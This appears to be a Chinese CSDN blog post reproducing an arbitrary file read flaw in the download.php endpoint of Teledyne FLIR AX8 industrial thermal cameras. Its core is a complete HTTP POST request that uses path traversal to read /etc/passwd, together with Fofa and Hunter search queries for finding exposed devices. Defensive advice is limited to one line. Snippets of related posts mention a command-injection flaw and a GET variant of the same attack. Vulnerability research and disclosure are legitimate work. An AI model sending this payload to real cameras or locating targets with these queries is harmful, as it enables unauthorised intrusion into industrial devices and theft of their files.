FLIR AX8 download.php 任意文件读取复现

最新推荐文章于 2024-11-09 23:34:47 发布
最新推荐文章于 2024-11-09 23:34:47 发布
阅读量827 收藏 2
点赞数 15
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142752652
版权

0x01 产品描述:

        FLIR-AX8是美国菲力尔公司(Teledyne FLIR)旗下的一款工业红外热像仪AX8,英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术,通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统,将创新的传感解决方案带入日常生活中,广泛服务于政府与国防、工业和商业市场。

0x02 漏洞描述:

         Teledyne FLIR AX8 thermal sensor cameras 1.46.16及之前的版本存在任意文件读取漏洞,该漏洞源于攻击者可以通过download.php中的file没有做参数校验导致任意文件读取。

0x03 影响版本:

FLIR AX8 thermal sensor cameras <= 1.46.16

0x04 搜索语句:

Fofa:app="FLIR-FLIR-AX8"

Hunter:web.icon=="f4370ff0b4763e18159cd7cdf36a4542"

0x05 漏洞复现:

POST /download.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ****
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

file=../../../etc/passwd

 

0x06 修复建议:

如非必要 请勿将系统在公网部署

iSee857
关注
专栏目录
漏洞复现FLIR AX8红外线热成像仪命令执行漏洞
失心少年
12-08 720
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。我们的产品,紧急救援人员,军事人员保护,救生,高运营效率,以及创新型消费技术。Teledyne FLIR 为加强公共安全和福利、提供高能源和时间效率、为正常健康和智能社会做出贡献增添了力量。自透射热图像、可见光图像、可见频率分析、来自测量和诊断的先进威胁测量系统以及日常生活的创新解决方案。
FLIR-AX8 任意文件下载(CNVD-2021-39018)
BeWorthyOf的博客
11-18 3260
FLIR-AX8存在任意文件下载漏洞。攻击者可利用漏洞下载相关系统配置文件
Flir AX8手册中文-zh-cn.pdf
08-12
这个是Flir AX8 热成像的开发说明手册,最近在研究这个设备二次开发,分享给大家作为参考。
FLIR AX8 res.php 代码执行
iSee857的博客
09-24 378
菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术,通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统,将创新的传感解决方案带入日常生活中,广泛服务于政府与国防、工业和商业市场。Teledyne FLIR AX8 thermal sensor cameras 1.46.16及之前的版本存在操作系统命令注入漏洞,该漏洞源于攻击者可以通过res.php端点中的id HTTP POST参数导致使用root权限在底层操作系统上执行任意命令。如非必要 请勿将系统在公网部署。
FLIR-AX8 任意文件下载
thelostworld
05-12 527
FLIR-AX8 任意文件下载一、漏洞描述FLIR-AX8 download.php存在任意文件下载漏洞,直接访问可下载相关系统配置文件。二、影响版本FLIR-AX8三、漏洞复现访问主页:详细数据包:GET /download.php?file=/etc/passwd HTTP/1.1 Host: 127.0.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5
FLIR-AX8热成像仪多个漏洞复现+代码分析
m0_64040060的博客
09-24 501
然后看下这三个判断,前两个是判断文件是否存在,且没有可控参数,第三个判断用shell_exec函数执行了一条命令,后面拼接了resource参数,而且最后一个是default,只要不符合前两个case的话,就会走到这里,所以这里直接输入;接下来是这三个地方接收了数据,第一个参数是文件名第二个是类型,第三个不知道干什么的,但是用三目运算符判断了一下,然后看下49行代码,这里判断了$is_attachment参数是否为真,如果为真的话这里是设置header头,问题不大,不耽误文件读取
FLIR-AX8 download.php 任意文件下载
qq_17754023的博客
11-05 830
FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
FLIR ONE 网上营销.doc
09-14
8. 整合营销:网络营销涵盖广告、公关、销售等多个环节,实现全面覆盖。 【网络营销对传统营销的冲击】 1. 市场及细分标准的改变:网络营销使得市场更加细化,消费者需求更加个性化。 2. 消费者作用的变化:消费者...
相机内参标定_test_FLIR_20E4C.7z
04-27
在"相机内参标定_test_FLIR_20E4C.7z"这个压缩包中,我们可以推测包含的是与FLIR 20E4C相机相关的内参标定数据和可能的标定工具或程序。 首先,我们要理解相机内参是什么。相机内参主要包括焦距、光心位置(即主点...
[0day]FLIR-FLIR-AX8某接口存在任意文件读取漏洞-未公开漏洞
weixin_43167326的博客
03-13 567
FLIR-AX8是美国菲力尔公司(Teledyne FLIR)旗下的一款工业红外热像仪AX8,英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术,通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统,将创新的传感解决方案带入日常生活中,广泛服务于政府与国防、工业和商业市场。
Flir AX8 红外摄像机获取温度值
Duier~Duier~
12-27 908
Flir AX8 红外摄像机获取六个点温度以及框的最高最低温度 实现原理源码maven引入jar包modbus读取寄存器类 实现原理 该摄像机支持modbus Tcp 通讯 只需要通过Java的modbus驱动包将相机寄存器内的相应寄存器值获取到即可 其实还可以获取别的设备状态设备文档中有详细解释这里不做过多说明。 源码 maven引入jar包 modbus4j-3.0.5.jar下载【链接】 <!-- Modbus4j引入 --> <dependency&g
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 1116
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
PHP常用的安全函数作用
sheji888的专栏
11-06 559
这些函数和方法有助于提升PHP应用的安全性,但安全是一个综合性的问题,需要综合使用多种手段,如输入验证、输出编码、会话管理、错误处理等。在PHP开发中,安全是非常重要的一个方面。
【AliCloud】ack + ack-secret-manager + kms 敏感数据安全存储
最新发布
StrayCat的博客
11-09 787
ack-secret-manager支持以Kubernetes Secret实例的形式向集群导入或同步KMS凭据信息,确保您集群内的应用能够安全地访问敏感信息。通过该组件,您可以实现密钥数据的自动更新,使应用负载通过文件系统挂载指定Secret实例来使用凭据信息,同时帮助您解决负载应用和阿里云凭据管家交互的兼容性问题。
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
weixin_46641057的博客
11-09 877
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领域知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
5. Redis的 安全与性能优化
一名全栈开发工程师
11-06 863
Redis引入了“沙盒机制”,即在脚本执行过程中,脚本被限制只能访问Redis的某些命令和数据集。
利用城市安全监测系统,筑牢自然灾害防线
njysiot的博客
11-06 256
对于洪水灾害,城市安全监测系统可以通过水位传感器、雨量传感器等设备,实时监测河流、湖泊和城市排水系统的水位变化以及降雨量。此外,系统还可以对城市的地下管网进行监测,及时发现管道堵塞和泄漏等问题,防止城市内涝的发生。在应对地震灾害方面,城市安全监测系统中的地震监测传感器可以实时捕捉地壳的微小震动,通过数据分析提前预测地震的发生。同时,系统还可以对建筑物的结构进行实时监测,评估地震对建筑物的影响,为后续的救援和重建工作提供重要依据。同时,还需要加强部门之间的协作和信息共享,形成应对自然灾害的合力。
python调用Flir.Atlas.Image.dll文件进行红外数据测量代码
09-13
在Python中调用Windows动态链接库(DLL)文件通常涉及使用`ctypes`模块,该模块允许Python代码加载DLL文件并调用其函数。`Flir.Atlas.Image.dll`是一个可能由FLIR热像仪或类似设备提供的库,用于处理红外图像数据。然而,需要注意的是,由于不同的设备和库可能有不同的函数接口和参数,以下是一个通用的示例,展示了如何使用`ctypes`加载和调用DLL中的函数。 首先,你需要确保你的Python环境可以访问到`Flir.Atlas.Image.dll`文件。通常,这个DLL文件应该位于FLIR提供的安装目录下。然后,你可以使用以下代码模板来加载DLL并尝试调用其函数。 ```python import ctypes # 加载DLL文件 flir_atlas_image_dll = ctypes.WinDLL('路径\\Flir.Atlas.Image.dll') # 假设我们要调用的函数名为CalculateTemperature,这是一个示例名称 # 你需要根据实际的函数名和参数来调整下面的代码 # 设置参数类型,这里假设函数需要两个参数,都是整型 flir_atlas_image_dll.CalculateTemperature.argtypes = [ctypes.c_int, ctypes.c_int] # 设置返回类型,这里假设函数返回一个浮点型值 flir_atlas_image_dll.CalculateTemperature.restype = ctypes.c_float # 调用函数,传入参数 result = flir_atlas_image_dll.CalculateTemperature(参数1, 参数2) # 打印结果 print(f"测量结果: {result}") ``` 请注意,上述代码中的`CalculateTemperature`函数和参数类型都是假设的。你需要查看FLIR提供的文档或者DLL的头文件来获取正确的函数名和参数类型。 由于具体函数名和参数类型未知,这段代码只是一个示例,用于展示如何通过`ctypes`模块调用DLL。实际使用时,你需要根据`Flir.Atlas.Image.dll`提供的具体函数名和参数进行相应的调整。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值